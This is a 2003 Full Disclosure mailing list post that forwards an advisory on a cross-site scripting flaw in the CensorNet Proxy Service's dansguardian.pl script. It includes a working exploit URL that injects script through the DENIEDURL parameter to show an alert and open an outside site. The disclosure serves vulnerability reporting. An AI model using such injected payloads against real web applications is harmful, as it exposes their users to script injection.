Full Disclosure mailing list archives
Fw: CensorNet: Cross Site Scripting Vulnerability
From: "Richard Maudsley" <r_i_c_h_lists () btopenworld com>
Date: Thu, 23 Oct 2003 18:49:02 +0100
----- Original Message ----- From: "Richard Maudsley" <maudr001 () rbwm org> To: <bugtraq () securityfocus com>; <support () adelix com>; <wrigd006 () rbwm org>; <frenw001 () rbwm org> Sent: Wednesday, October 22, 2003 12:51 PM Subject: CensorNet: Cross Site Scripting Vulnerability Hello, A cross site scripting vulnerability exists in the CensorNet Proxy Service (www.censornet.com) that allows scripting (and html) to be passed to the cgi script and displayed in the web browser. Exploit: http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script> Regards, Richard Maudsley - ------------------------------------------------------------------- This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the content of this email please contact abuse () rbwm org - ------------------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Fw: CensorNet: Cross Site Scripting Vulnerability Richard Maudsley (Oct 24)